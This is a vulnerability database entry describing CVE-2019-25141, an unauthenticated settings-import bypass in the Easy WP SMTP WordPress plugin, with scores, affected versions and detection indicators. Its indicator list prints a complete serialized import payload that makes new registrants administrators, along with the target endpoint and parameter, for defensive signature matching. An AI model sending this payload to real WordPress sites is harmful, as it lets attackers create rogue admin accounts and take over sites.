cbcvebase.
CVE-2019-25141
published 2023-06-07

CVE-2019-25141: The Easy WP SMTP plugin for WordPress is vulnerable to authorization bypass in versions up to, and including, 1.3.9. This is due to missing capability checks…

PriorityP183critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
4.46%
90.2th percentile
The Easy WP SMTP plugin for WordPress is vulnerable to authorization bypass in versions up to, and including, 1.3.9. This is due to missing capability checks on the admin_init() function, in addition to insufficient input validation. This makes it possible for unauthenticated attackers to modify the plugins settings and arbitrary options on the site that can be used to inject new administrative user accounts.

Affected

1 ranges
VendorProductVersion rangeFixed in
wp-ecommerceeasy_wp_smtp<= 1.3.9

Detection & IOCsextracted from sources · hover to see the quote

url/wp-admin/admin-ajax.php
path/wp-content/plugins/easy-wp-smtp/
commandaction=swpsmtp_clear_log
commandswpsmtp_import_settings=1
othera:2:{s:4:"data";s:81:"a:2:{s:18:"users_can_register";s:1:"1";s:12:"default_role";s:13:"administrator";}";s:8:"checksum";s:32:"3ce5fb6d7b1dbd6252f4b5b3526650c8";}
  • Look for multipart upload of a .txt file via the swpsmtp_import_settings_file field containing a PHP serialized payload with users_can_register=1 and default_role=administrator, indicating an attempt to create a rogue admin account.
  • A successful exploitation results in an HTTP 302 redirect to options-general.php?page=swpsmtp_settings; monitor for this response pattern following unauthenticated admin-ajax.php POSTs.
  • Presence of the Easy WP SMTP plugin path in web server logs or HTTP responses can identify vulnerable targets.
  • ·The vulnerability affects Easy WP SMTP versions up to and including 1.3.9; version 1.4.0 and later are patched. Ensure version checks are scoped accordingly.
  • ·The exploit payload uses a known static MD5 checksum (3ce5fb6d7b1dbd6252f4b5b3526650c8) embedded in the serialized import file; this checksum may be used as a static signature but could be trivially altered by an attacker.
  • ·The Nuclei template is marked 'intrusive' — running this detection probe will actively attempt to modify WordPress site options and should only be used in authorized testing environments.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.